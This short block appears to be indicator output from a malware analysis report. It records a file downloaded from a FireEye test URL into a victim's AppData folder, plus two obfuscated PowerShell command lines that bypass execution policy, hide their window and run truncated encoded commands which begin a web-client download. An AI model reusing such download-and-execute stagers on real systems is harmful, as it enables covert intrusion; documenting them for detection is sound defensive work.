Technical information
- https://fedeploycheck.fireeye.com/test-infection.exe as c:\users\victim\appdata\roaming\1.exe
- '<SYSTEM32>\cmd.exe' /c pOwerSHell.exe -eXecuTIonPoLIcy byPAss -nOproFIlE -WiNDOwstYlE HIddEN -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgB...
- '<SYSTEM32>\cmd.exe' /c pOwerSHell.exe -eXecuTIonPoLIcy byPAss -nOproFIlE -WiNDOwstYlE HIddEN -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgB...' (with hidden window)